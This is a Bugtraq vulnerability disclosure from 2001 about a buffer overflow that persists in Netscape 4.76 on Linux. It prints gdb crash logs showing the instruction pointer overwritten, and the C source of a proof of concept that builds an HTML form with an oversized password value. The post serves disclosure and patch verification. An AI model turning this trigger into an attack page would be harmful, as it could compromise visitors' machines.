Bugtraq mailing list archives
Buffer Overflow still exists in Netscape <= 4.76
From: fish stiqz <fish () ANALOG ORG>
Date: Tue, 16 Jan 2001 00:19:43 -0500
Hello. I have noticed that the buffer overflow discovered by Michal Zalewski and covered extensively by the different unix distributions is still present in netscape 4.76 even though they claim it is not. Refer to these links for background information: http://security-archive.merton.ox.ac.uk/bugtraq-200011/0099.html http://security-archive.merton.ox.ac.uk/bugtraq-200011/0426.html http://www.redhat.com/support/errata/RHSA-2000-109.html All of the above advisories (and all that I've seen) state that netscape versions up to and including 4.75 are vulnerable, not 4.76. I have caused netscape 4.76 on both redhat 6.2 and slackware-current to segfault. Below is the proof of the pudding: On slackware-current (netscape.tgz): $ ./nutscrape 20000 > crash_me.html $ netscape -v Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp. $ gdb /usr/bin/netscape GNU gdb 5.0 Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-slackware-linux"... (no debugging symbols found)... (gdb) set args http://fish.analog.org/~fish/crash_me.html (gdb) run Starting program: /usr/bin/netscape http://fish.analog.org/~fish/crash_me.html warning: Unable to find dynamic linker breakpoint function. GDB will be unable to debug shared library initializers and track explicitly loaded dynamic code. (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) info all-registers eax 0x41414141 1094795585 ecx 0xbfffd904 -1073751804 edx 0x91c1c00 152837120 ebx 0x175a2c 1530412 esp 0xbfffd83c 0xbfffd83c ebp 0xbfffd864 0xbfffd864 esi 0x0 0 edi 0x921eb8c 153217932 eip 0x41414141 0x41414141 eflags 0x10246 66118 <snip> On Redhat 6.2 (netscape-communicator-4.76-0.6.2.i386.rpm): $ cat /etc/redhat-release Red Hat Linux release 6.2 (Zoot) $ netscape -v Netscape 4.76/U.S., 06-Oct-00; (c) 1995-2000 Netscape Communications Corp. $ rpm -qa |grep netscape netscape-communicator-4.76-0.6.2 netscape-common-4.76-0.6.2 $ gdb /usr/lib/netscape/netscape-communicator GNU gdb 19991004 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (no debugging symbols found)... (gdb) run http://fish.analog.org/~fish/crash_me.html Starting program: /usr/lib/netscape/netscape-communicator http://fish.analog.org/~fish/crash_me.html Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? ()Cannot access memory at address 0x7f0000 (gdb) info all-registers eax 0x41414141 1094795585 ecx 0xbfffdd14 -1073750764 edx 0x9268200 153518592 ebx 0x40064a2c 1074154028 esp 0xbfffdc4c -1073750964 ebp 0xbfffdc74 -1073750924 esi 0x0 0 edi 0x92624ec 153494764 eip 0x41414141 1094795585 eflags 0x10246 66118 <snip> So we see here that out eip is now 0x41414141. This is obviously bad. Windows versions seem to not be vulnerable, although I have only tested this on versions 4.08 and 4.61. If this vulnerability is exploited, an attacker could gain entrance to potentially any computer running vulnerable versions of netscape that visits his website. To test if you are vulnerable, point your browser to http://fish.analog.org/~fish/crash_netscape.html (15,000 A's) or http://fish.analog.org/~fish/crash_netscape2.html (100,000 A's) My Findings: (you may have to hit reload before the browser will crash): Number of A's | Result ------------------------------------------------------- 1000 Nothing. 2000 Nothing. 5000 Memory corruption (check view source and you may see this) 7000 Continued corruption. 10000 SIGSEGV in PR_HashTableRawLookup () 15000 SIGSEGV in _MD_GetArchitecture ()
= 20000 SIGSEGV in XFE_GetFormElementInfo ()
And, sometimes eip overwrite. ------------------------------------------------------- nutscrape.c is a very trivial program that generates a big html form value in an input field, which causes the overflow. /* * nutscrape.c - fish stiqz <fish () analog org> * Trivial overflow in netscape. */ #include <stdio.h> #include <stdlib.h> #define OVERFLOW_BYTE 0x41 void usage(char *p) { fprintf(stderr, "usage: %s <num of %c's>\n", p, OVERFLOW_BYTE); exit(EXIT_FAILURE); } int main(int argc, char **argv) { int i, t; if(argc != 2) usage(argv[0]); t = atoi(argv[1]); printf("<html>\n\n<head>\n<title>Test of Netscape</title>\n" "</head>\n\n<body>\n\n\n<form action=foo method=bar>\n" "<input type=password value="); for(i = 0; i < t; i++) putc(OVERFLOW_BYTE, stdout); printf(">\nmore form tags\n</form>\n\n\n</body>\n</html>\n"); return EXIT_SUCCESS; } So, in summary, If you upgraded to netscape 4.76 to fix the buffer overflow problem, then you upgraded in vain, the problem most definitely still exists. Hope you all have a good day. - fish stiqz shoutouts to nerile. #TelcoNinjas suck. -- +---------------------------------------------------------------------------+ | fish stiqz <fish () analog org> <*)))-< ** yum, yum, delicious ** | +---------------------------------------------------------------------------+
Current thread:
- Buffer Overflow still exists in Netscape <= 4.76 fish stiqz (Jan 16)
- Re: Buffer Overflow still exists in Netscape <= 4.76 Szilveszter Adam (Jan 16)
- Re: Buffer Overflow still exists in Netscape <= 4.76 Frank v Waveren (Jan 16)
- Re: Buffer Overflow still exists in Netscape <= 4.76 fish stiqz (Jan 16)
- Re: Buffer Overflow still exists in Netscape <= 4.76 Arthur Clune (Jan 17)
- Re: Buffer Overflow still exists in Netscape <= 4.76 Henryk Plötz (Jan 23)
- Re: Buffer Overflow still exists in Netscape <= 4.76 fish stiqz (Jan 16)